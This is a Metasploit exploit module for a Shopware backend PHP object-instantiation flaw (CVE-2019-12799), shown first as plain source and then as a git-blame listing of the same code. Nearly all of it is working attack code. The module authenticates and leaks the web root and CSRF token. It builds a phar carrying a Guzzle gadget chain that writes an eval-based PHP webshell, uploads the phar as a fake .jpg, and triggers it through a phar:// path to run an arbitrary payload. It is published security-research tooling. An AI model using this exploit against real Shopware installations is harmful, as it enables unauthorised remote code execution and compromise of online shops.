modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Shopware createInstanceFromNamedArguments PHP Object Instantiation RCE",
        'Description' => %q{
          This module exploits a php object instantiation vulnerability that can lead to RCE in
          Shopware. An authenticated backend user could exploit the vulnerability.

          The vulnerability exists in the createInstanceFromNamedArguments function, where the code
          insufficiently performs whitelist check which can be bypassed to trigger an object injection.

          An attacker can leverage this to deserialize an arbitrary payload and write a webshell to
          the target system, resulting in remote code execution.

          Tested on Shopware git branches 5.6, 5.5, 5.4, 5.3.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Karim Ouerghemmi', # original discovery
          'mr_me <steven@srcincite.io>', # patch bypass, rce & msf module
        ],
        'References' => [
          ['CVE', '2019-12799'], # yes really, assigned per request
          ['CVE', '2017-18357'],                                                                         # not really because we bypassed this patch
          ['URL', 'https://blog.ripstech.com/2017/shopware-php-object-instantiation-to-blind-xxe/']      # initial writeup w/ limited exploitation
        ],
        'Platform' => 'php',
        'Arch' => ARCH_PHP,
        'Targets' => [['Automatic', {}]],
        'Privileged' => false,
        'DisclosureDate' => '2019-05-09',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, "Base Shopware path", '/']),
        OptString.new('USERNAME', [true, "Backend username to authenticate with", 'demo']),
        OptString.new('PASSWORD', [false, "Backend password to authenticate with", 'demo'])
      ]
    )
  end

  def do_login
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'backend', 'Login', 'login'),
      'vars_post' => {
        'username' => datastore['username'],
        'password' => datastore['password'],
      }
    )
    unless res
      fail_with(Failure::Unreachable, "Connection failed")
    end
    if res.code == 200
      cookie = res.get_cookies.scan(%r{(SHOPWAREBACKEND=.{26};)}).flatten.first
      if res.nil?
        return
      end

      return cookie
    end
    return
  end

  def get_webroot(cookie)
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'backend', 'systeminfo', 'info'),
      'cookie' => cookie
    )
    unless res
      fail_with(Failure::Unreachable, "Connection failed")
    end
    if res.code == 200
      return res.body.scan(%r{DOCUMENT_ROOT </td><td class="v">(.*) </td></tr>}).flatten.first
    end

    return
  end

  def leak_csrf(cookie)
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'backend', 'CSRFToken', 'generate'),
      'cookie' => cookie
    )
    unless res
      fail_with(Failure::Unreachable, "Connection failed")
    end
    if res.code == 200
      if res.headers.include?('X-Csrf-Token')
        return res.headers['X-Csrf-Token']
      end
    end
    return
  end

  def generate_phar(webroot)
    php = Rex::FileUtils.normalize_unix_path("#{webroot}#{target_uri.path}media/#{@shll_bd}.php")
    register_file_for_cleanup("#{@shll_bd}.php")
    pop = "O:31:\"GuzzleHttp\\Cookie\\FileCookieJar\":2:{s:41:\"\x00GuzzleHttp\\Cookie\\FileCookieJar\x00filename\";"
    pop << "s:#{php.length}:\"#{php}\";"
    pop << "s:36:\"\x00GuzzleHttp\\Cookie\\CookieJar\x00cookies\";"
    pop << "a:1:{i:0;O:27:\"GuzzleHttp\\Cookie\\SetCookie\":1:{s:33:\"\x00GuzzleHttp\\Cookie\\SetCookie\x00data\";"
    pop << "a:3:{s:5:\"Value\";"
    pop << "s:48:\"<?php eval(base64_decode($_SERVER[HTTP_#{@header}])); ?>\";"
    pop << "s:7:\"Expires\";"
    pop << "b:1;"
    pop << "s:7:\"Discard\";"
    pop << "b:0;}}}}"
    file = Rex::Text.rand_text_alpha_lower(8)
    stub = "<?php __HALT_COMPILER(); ?>\r\n"
    file_contents = Rex::Text.rand_text_alpha_lower(20)
    file_crc32 = Zlib::crc32(file_contents) & 0xffffffff
    manifest_len = 40 + pop.length + file.length
    phar = stub
    phar << [manifest_len].pack('V')              # length of manifest in bytes
    phar << [0x1].pack('V')                       # number of files in the phar
    phar << [0x11].pack('v')                      # api version of the phar manifest
    phar << [0x10000].pack('V')                   # global phar bitmapped flags
    phar << [0x0].pack('V')                       # length of phar alias
    phar << [pop.length].pack('V')                # length of phar metadata
    phar << pop                                   # pop chain
    phar << [file.length].pack('V')               # length of filename in the archive
    phar << file                                  # filename
    phar << [file_contents.length].pack('V')      # length of the uncompressed file contents
    phar << [0x0].pack('V')                       # unix timestamp of file set to Jan 01 1970.
    phar << [file_contents.length].pack('V')      # length of the compressed file contents
    phar << [file_crc32].pack('V')                # crc32 checksum of un-compressed file contents
    phar << [0x1b6].pack('V')                     # bit-mapped file-specific flags
    phar << [0x0].pack('V')                       # serialized File Meta-data length
    phar << file_contents                         # serialized File Meta-data
    phar << [Rex::Text.sha1(phar)].pack('H*')     # signature
    phar << [0x2].pack('V')                       # signiture type
    phar << "GBMB"                                # signature presence
    return phar
  end

  def upload(cookie, csrf_token, phar)
    data = Rex::MIME::Message.new
    data.add_part(phar, Rex::Text.rand_text_alpha_lower(8), nil, "name=\"fileId\"; filename=\"#{@phar_bd}.jpg\"")
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri, 'backend', 'mediaManager', 'upload'),
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => data.to_s,
      'cookie' => cookie,
      'headers' => {
        'X-CSRF-Token' => csrf_token
      }
    )
    unless res
      fail_with(Failure::Unreachable, "Connection failed")
    end
    if res.code == 200 && res.body =~ /Image is not in a recognized format/i
      return true
    end

    return
  end

  def leak_upload(cookie, csrf_token)
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'backend', 'MediaManager', 'getAlbumMedia'),
      'cookie' => cookie,
      'headers' => {
        'X-CSRF-Token' => csrf_token
      }
    )
    unless res
      fail_with(Failure::Unreachable, "Connection failed")
    end
    if res.code == 200 && res.body =~ /#{@phar_bd}.jpg/i
      bd_path = $1 if res.body =~ /media\\\/image\\\/(.{10})\\\/#{@phar_bd}/
      register_file_for_cleanup("image/#{bd_path.gsub("\\", "")}/#{@phar_bd}.jpg")
      return "media/image/#{bd_path.gsub("\\", "")}/#{@phar_bd}.jpg"
    end
    return
  end

  def trigger_bug(cookie, csrf_token, upload_path)
    sort = {
      "Shopware_Components_CsvIterator" => {
        "filename" => "phar://#{upload_path}",
        "delimiter" => "",
        "header" => ""
      }
    }
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'backend', 'ProductStream', 'loadPreview'),
      'cookie' => cookie,
      'headers' => {
        'X-CSRF-Token' => csrf_token
      },
      'vars_get' => { 'sort' => sort.to_json }
    )
    unless res
      fail_with(Failure::Unreachable, "Connection failed")
    end
    return
  end

  def exec_code
    send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "media", "#{@shll_bd}.php"),
      'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
    }, 1)
  end

  def check
    cookie = do_login
    if cookie.nil?
      vprint_error "Authentication was unsuccessful"
      return Exploit::CheckCode::Safe
    end
    csrf_token = leak_csrf(cookie)
    if csrf_token.nil?
      vprint_error "Unable to leak the CSRF token"
      return Exploit::CheckCode::Safe
    end
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'backend', 'ProductStream', 'loadPreview'),
      'cookie' => cookie,
      'headers' => { 'X-CSRF-Token' => csrf_token }
    )
    if res.code == 200 && res.body =~ /Shop not found/i
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    unless Exploit::CheckCode::Vulnerable == check
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end
    @phar_bd = Rex::Text.rand_text_alpha_lower(8)
    @shll_bd = Rex::Text.rand_text_alpha_lower(8)
    @header = Rex::Text.rand_text_alpha_upper(2)
    cookie = do_login
    if cookie.nil?
      fail_with(Failure::NoAccess, "Authentication was unsuccessful")
    end
    print_good("Stage 1 - logged in with #{datastore['username']}: #{cookie}")
    web_root = get_webroot(cookie)
    if web_root.nil?
      fail_with(Failure::Unknown, "Unable to leak the webroot")
    end
    print_good("Stage 2 - leaked the web root: #{web_root}")
    csrf_token = leak_csrf(cookie)
    if csrf_token.nil?
      fail_with(Failure::Unknown, "Unable to leak the CSRF token")
    end
    print_good("Stage 3 - leaked the CSRF token: #{csrf_token}")
    phar = generate_phar(web_root)
    print_good("Stage 4 - generated our phar")
    if !upload(cookie, csrf_token, phar)
      fail_with(Failure::Unknown, "Unable to upload phar archive")
    end
    print_good("Stage 5 - uploaded phar")
    upload_path = leak_upload(cookie, csrf_token)
    if upload_path.nil?
      fail_with(Failure::Unknown, "Cannot find phar archive")
    end
    print_good("Stage 6 - leaked phar location: #{upload_path}")
    trigger_bug(cookie, csrf_token, upload_path)
    print_good("Stage 7 - triggered object instantiation!")
    exec_code
  end
end
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`##`
			`# This module requires Metasploit: https://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`class MetasploitModule < Msf::Exploit::Remote`
added a new line at the end 2019-05-09 15:35:00 -05:00			`Rank = ExcellentRanking`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00
			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Exploit::FileDropper`

			`def initialize(info = {})`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`super(`
			`update_info(`
			`info,`
			`'Name' => "Shopware createInstanceFromNamedArguments PHP Object Instantiation RCE",`
			`'Description' => %q{`
			`This module exploits a php object instantiation vulnerability that can lead to RCE in`
			`Shopware. An authenticated backend user could exploit the vulnerability.`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`The vulnerability exists in the createInstanceFromNamedArguments function, where the code`
			`insufficiently performs whitelist check which can be bypassed to trigger an object injection.`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`An attacker can leverage this to deserialize an arbitrary payload and write a webshell to`
			`the target system, resulting in remote code execution.`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`Tested on Shopware git branches 5.6, 5.5, 5.4, 5.3.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => [`
			`'Karim Ouerghemmi', # original discovery`
			`'mr_me <steven@srcincite.io>', # patch bypass, rce & msf module`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'References' => [`
			`['CVE', '2019-12799'], # yes really, assigned per request`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`['CVE', '2017-18357'], # not really because we bypassed this patch`
			`['URL', 'https://blog.ripstech.com/2017/shopware-php-object-instantiation-to-blind-xxe/'] # initial writeup w/ limited exploitation`
			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Platform' => 'php',`
			`'Arch' => ARCH_PHP,`
			`'Targets' => [['Automatic', {}]],`
			`'Privileged' => false,`
			`'DisclosureDate' => '2019-05-09',`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`'DefaultTarget' => 0,`
			`'Notes' => {`
Update info -d markdown 2025-06-23 12:43:46 +01:00			`'Reliability' => UNKNOWN_RELIABILITY,`
			`'Stability' => UNKNOWN_STABILITY,`
			`'SideEffects' => UNKNOWN_SIDE_EFFECTS`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`}`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`)`
			`)`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00
			`register_options(`
			`[`
			`OptString.new('TARGETURI', [true, "Base Shopware path", '/']),`
			`OptString.new('USERNAME', [true, "Backend username to authenticate with", 'demo']),`
			`OptString.new('PASSWORD', [false, "Backend password to authenticate with", 'demo'])`
			`]`
			`)`
			`end`

don't override the check method 2019-05-12 20:08:52 -05:00			`def do_login`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`res = send_request_cgi(`
			`'method' => 'POST',`
			`'uri' => normalize_uri(target_uri.path, 'backend', 'Login', 'login'),`
			`'vars_post' => {`
			`'username' => datastore['username'],`
			`'password' => datastore['password'],`
			`}`
			`)`
			`unless res`
added module for CVE-2017-18357 2019-05-09 15:17:43 -05:00			`fail_with(Failure::Unreachable, "Connection failed")`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`end`
			`if res.code == 200`
final commit: fixed check method to not print as suggested by @bcoles 2019-05-10 09:45:21 -05:00			`cookie = res.get_cookies.scan(%r{(SHOPWAREBACKEND=.{26};)}).flatten.first`
			`if res.nil?`
			`return`
			`end`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00
final commit: fixed check method to not print as suggested by @bcoles 2019-05-10 09:45:21 -05:00			`return cookie`
			`end`
don't override the check method 2019-05-12 20:08:52 -05:00			`return`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`end`

@bcoles is a purist :p 2019-05-09 22:21:26 -05:00			`def get_webroot(cookie)`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`res = send_request_cgi(`
			`'method' => 'GET',`
			`'uri' => normalize_uri(target_uri.path, 'backend', 'systeminfo', 'info'),`
@bcoles is a purist :p 2019-05-09 22:21:26 -05:00			`'cookie' => cookie`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`)`
			`unless res`
added module for CVE-2017-18357 2019-05-09 15:17:43 -05:00			`fail_with(Failure::Unreachable, "Connection failed")`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`end`
changed regex as suggested by @bcoles 2019-05-09 21:18:14 -05:00			`if res.code == 200`
@bcoles is a purist :p 2019-05-09 22:21:26 -05:00			`return res.body.scan(%r{DOCUMENT_ROOT </td><td class="v">(.*) </td></tr>}).flatten.first`
updated module to address @bcoles's comments 2019-05-09 20:53:49 -05:00			`end`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00
don't override the check method 2019-05-12 20:08:52 -05:00			`return`
			`end`

			`def leak_csrf(cookie)`
			`res = send_request_cgi(`
			`'method' => 'GET',`
			`'uri' => normalize_uri(target_uri.path, 'backend', 'CSRFToken', 'generate'),`
			`'cookie' => cookie`
			`)`
			`unless res`
			`fail_with(Failure::Unreachable, "Connection failed")`
			`end`
			`if res.code == 200`
			`if res.headers.include?('X-Csrf-Token')`
			`return res.headers['X-Csrf-Token']`
			`end`
			`end`
			`return`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`end`

@bcoles is a purist :p 2019-05-09 22:21:26 -05:00			`def generate_phar(webroot)`
Normalize PHP payload path 2019-05-17 18:20:59 -05:00			`php = Rex::FileUtils.normalize_unix_path("#{webroot}#{target_uri.path}media/#{@shll_bd}.php")`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`register_file_for_cleanup("#{@shll_bd}.php")`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`pop = "O:31:\"GuzzleHttp\\Cookie\\FileCookieJar\":2:{s:41:\"\x00GuzzleHttp\\Cookie\\FileCookieJar\x00filename\";"`
@bcoles is a purist :p 2019-05-09 22:21:26 -05:00			`pop << "s:#{php.length}:\"#{php}\";"`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`pop << "s:36:\"\x00GuzzleHttp\\Cookie\\CookieJar\x00cookies\";"`
			`pop << "a:1:{i:0;O:27:\"GuzzleHttp\\Cookie\\SetCookie\":1:{s:33:\"\x00GuzzleHttp\\Cookie\\SetCookie\x00data\";"`
			`pop << "a:3:{s:5:\"Value\";"`
			`pop << "s:48:\"<?php eval(base64_decode($_SERVER[HTTP_#{@header}])); ?>\";"`
			`pop << "s:7:\"Expires\";"`
			`pop << "b:1;"`
			`pop << "s:7:\"Discard\";"`
			`pop << "b:0;}}}}"`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`file = Rex::Text.rand_text_alpha_lower(8)`
			`stub = "<?php __HALT_COMPILER(); ?>\r\n"`
added module for CVE-2017-18357 2019-05-09 15:17:43 -05:00			`file_contents = Rex::Text.rand_text_alpha_lower(20)`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`file_crc32 = Zlib::crc32(file_contents) & 0xffffffff`
			`manifest_len = 40 + pop.length + file.length`
			`phar = stub`
updated module to address @bcoles's comments 2019-05-09 20:53:49 -05:00			`phar << [manifest_len].pack('V') # length of manifest in bytes`
			`phar << [0x1].pack('V') # number of files in the phar`
			`phar << [0x11].pack('v') # api version of the phar manifest`
			`phar << [0x10000].pack('V') # global phar bitmapped flags`
			`phar << [0x0].pack('V') # length of phar alias`
			`phar << [pop.length].pack('V') # length of phar metadata`
			`phar << pop # pop chain`
			`phar << [file.length].pack('V') # length of filename in the archive`
			`phar << file # filename`
			`phar << [file_contents.length].pack('V') # length of the uncompressed file contents`
			`phar << [0x0].pack('V') # unix timestamp of file set to Jan 01 1970.`
			`phar << [file_contents.length].pack('V') # length of the compressed file contents`
			`phar << [file_crc32].pack('V') # crc32 checksum of un-compressed file contents`
			`phar << [0x1b6].pack('V') # bit-mapped file-specific flags`
			`phar << [0x0].pack('V') # serialized File Meta-data length`
			`phar << file_contents # serialized File Meta-data`
fixed some error conditions, changed regex as suggested by @bcoles 2019-05-09 21:14:54 -05:00			`phar << [Rex::Text.sha1(phar)].pack('H*') # signature`
updated module to address @bcoles's comments 2019-05-09 20:53:49 -05:00			`phar << [0x2].pack('V') # signiture type`
			`phar << "GBMB" # signature presence`
			`return phar`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`end`

@bcoles is a purist :p 2019-05-09 22:21:26 -05:00			`def upload(cookie, csrf_token, phar)`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`data = Rex::MIME::Message.new`
updated module to address @bcoles's comments 2019-05-09 20:53:49 -05:00			`data.add_part(phar, Rex::Text.rand_text_alpha_lower(8), nil, "name=\"fileId\"; filename=\"#{@phar_bd}.jpg\"")`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`res = send_request_cgi(`
			`'method' => 'POST',`
			`'uri' => normalize_uri(target_uri, 'backend', 'mediaManager', 'upload'),`
			`'ctype' => "multipart/form-data; boundary=#{data.bound}",`
			`'data' => data.to_s,`
@bcoles is a purist :p 2019-05-09 22:21:26 -05:00			`'cookie' => cookie,`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`'headers' => {`
@bcoles is a purist :p 2019-05-09 22:21:26 -05:00			`'X-CSRF-Token' => csrf_token`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`}`
			`)`
			`unless res`
			`fail_with(Failure::Unreachable, "Connection failed")`
			`end`
			`if res.code == 200 && res.body =~ /Image is not in a recognized format/i`
don't override the check method 2019-05-12 20:08:52 -05:00			`return true`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`end`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00
don't override the check method 2019-05-12 20:08:52 -05:00			`return`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`end`

@bcoles is a purist :p 2019-05-09 22:21:26 -05:00			`def leak_upload(cookie, csrf_token)`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`res = send_request_cgi(`
			`'method' => 'GET',`
			`'uri' => normalize_uri(target_uri.path, 'backend', 'MediaManager', 'getAlbumMedia'),`
@bcoles is a purist :p 2019-05-09 22:21:26 -05:00			`'cookie' => cookie,`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`'headers' => {`
@bcoles is a purist :p 2019-05-09 22:21:26 -05:00			`'X-CSRF-Token' => csrf_token`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`}`
			`)`
			`unless res`
			`fail_with(Failure::Unreachable, "Connection failed")`
			`end`
			`if res.code == 200 && res.body =~ /#{@phar_bd}.jpg/i`
			`bd_path = $1 if res.body =~ /media\\\/image\\\/(.{10})\\\/#{@phar_bd}/`
			`register_file_for_cleanup("image/#{bd_path.gsub("\\", "")}/#{@phar_bd}.jpg")`
@bcoles is a purist :p 2019-05-09 22:21:26 -05:00			`return "media/image/#{bd_path.gsub("\\", "")}/#{@phar_bd}.jpg"`
fixed some error conditions, changed regex as suggested by @bcoles 2019-05-09 21:14:54 -05:00			`end`
don't override the check method 2019-05-12 20:08:52 -05:00			`return`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`end`

@bcoles is a purist :p 2019-05-09 22:21:26 -05:00			`def trigger_bug(cookie, csrf_token, upload_path)`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`sort = {`
			`"Shopware_Components_CsvIterator" => {`
@bcoles is a purist :p 2019-05-09 22:21:26 -05:00			`"filename" => "phar://#{upload_path}",`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`"delimiter" => "",`
			`"header" => ""`
			`}`
			`}`
			`res = send_request_cgi(`
			`'method' => 'GET',`
			`'uri' => normalize_uri(target_uri.path, 'backend', 'ProductStream', 'loadPreview'),`
@bcoles is a purist :p 2019-05-09 22:21:26 -05:00			`'cookie' => cookie,`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`'headers' => {`
@bcoles is a purist :p 2019-05-09 22:21:26 -05:00			`'X-CSRF-Token' => csrf_token`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`},`
			`'vars_get' => { 'sort' => sort.to_json }`
			`)`
			`unless res`
added module for CVE-2017-18357 2019-05-09 15:17:43 -05:00			`fail_with(Failure::Unreachable, "Connection failed")`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`end`
			`return`
			`end`

			`def exec_code`
			`send_request_cgi({`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'method' => 'GET',`
			`'uri' => normalize_uri(target_uri.path, "media", "#{@shll_bd}.php"),`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"`
fixed timing of exec 2019-05-09 20:58:14 -05:00			`}, 1)`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`end`

			`def check`
don't override the check method 2019-05-12 20:08:52 -05:00			`cookie = do_login`
final commit: fixed check method to not print as suggested by @bcoles 2019-05-10 09:45:21 -05:00			`if cookie.nil?`
added some vprint_error calls in the check 2019-05-13 17:36:06 -05:00			`vprint_error "Authentication was unsuccessful"`
final commit: fixed check method to not print as suggested by @bcoles 2019-05-10 09:45:21 -05:00			`return Exploit::CheckCode::Safe`
			`end`
don't override the check method 2019-05-12 20:08:52 -05:00			`csrf_token = leak_csrf(cookie)`
final commit: fixed check method to not print as suggested by @bcoles 2019-05-10 09:45:21 -05:00			`if csrf_token.nil?`
added some vprint_error calls in the check 2019-05-13 17:36:06 -05:00			`vprint_error "Unable to leak the CSRF token"`
final commit: fixed check method to not print as suggested by @bcoles 2019-05-10 09:45:21 -05:00			`return Exploit::CheckCode::Safe`
			`end`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`res = send_request_cgi(`
			`'method' => 'GET',`
			`'uri' => normalize_uri(target_uri.path, 'backend', 'ProductStream', 'loadPreview'),`
@bcoles is a purist :p 2019-05-09 22:21:26 -05:00			`'cookie' => cookie,`
			`'headers' => { 'X-CSRF-Token' => csrf_token }`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`)`
			`if res.code == 200 && res.body =~ /Shop not found/i`
			`return Exploit::CheckCode::Vulnerable`
			`end`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`return Exploit::CheckCode::Safe`
			`end`

			`def exploit`
			`unless Exploit::CheckCode::Vulnerable == check`
			`fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')`
			`end`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`@phar_bd = Rex::Text.rand_text_alpha_lower(8)`
			`@shll_bd = Rex::Text.rand_text_alpha_lower(8)`
			`@header = Rex::Text.rand_text_alpha_upper(2)`
don't override the check method 2019-05-12 20:08:52 -05:00			`cookie = do_login`
			`if cookie.nil?`
			`fail_with(Failure::NoAccess, "Authentication was unsuccessful")`
			`end`
@bcoles is a purist :p 2019-05-09 22:21:26 -05:00			`print_good("Stage 1 - logged in with #{datastore['username']}: #{cookie}")`
final commit: fixed check method to not print as suggested by @bcoles 2019-05-10 09:45:21 -05:00			`web_root = get_webroot(cookie)`
don't override the check method 2019-05-12 20:08:52 -05:00			`if web_root.nil?`
			`fail_with(Failure::Unknown, "Unable to leak the webroot")`
			`end`
final commit: fixed check method to not print as suggested by @bcoles 2019-05-10 09:45:21 -05:00			`print_good("Stage 2 - leaked the web root: #{web_root}")`
don't override the check method 2019-05-12 20:08:52 -05:00			`csrf_token = leak_csrf(cookie)`
			`if csrf_token.nil?`
			`fail_with(Failure::Unknown, "Unable to leak the CSRF token")`
			`end`
@bcoles is a purist :p 2019-05-09 22:21:26 -05:00			`print_good("Stage 3 - leaked the CSRF token: #{csrf_token}")`
final commit: fixed check method to not print as suggested by @bcoles 2019-05-10 09:45:21 -05:00			`phar = generate_phar(web_root)`
updated module to address @bcoles's comments 2019-05-09 20:53:49 -05:00			`print_good("Stage 4 - generated our phar")`
don't override the check method 2019-05-12 20:08:52 -05:00			`if !upload(cookie, csrf_token, phar)`
			`fail_with(Failure::Unknown, "Unable to upload phar archive")`
			`end`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`print_good("Stage 5 - uploaded phar")`
@bcoles is a purist :p 2019-05-09 22:21:26 -05:00			`upload_path = leak_upload(cookie, csrf_token)`
don't override the check method 2019-05-12 20:08:52 -05:00			`if upload_path.nil?`
			`fail_with(Failure::Unknown, "Cannot find phar archive")`
			`end`
@bcoles is a purist :p 2019-05-09 22:21:26 -05:00			`print_good("Stage 6 - leaked phar location: #{upload_path}")`
			`trigger_bug(cookie, csrf_token, upload_path)`
added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00			`print_good("Stage 7 - triggered object instantiation!")`
			`exec_code`
			`end`
			`end`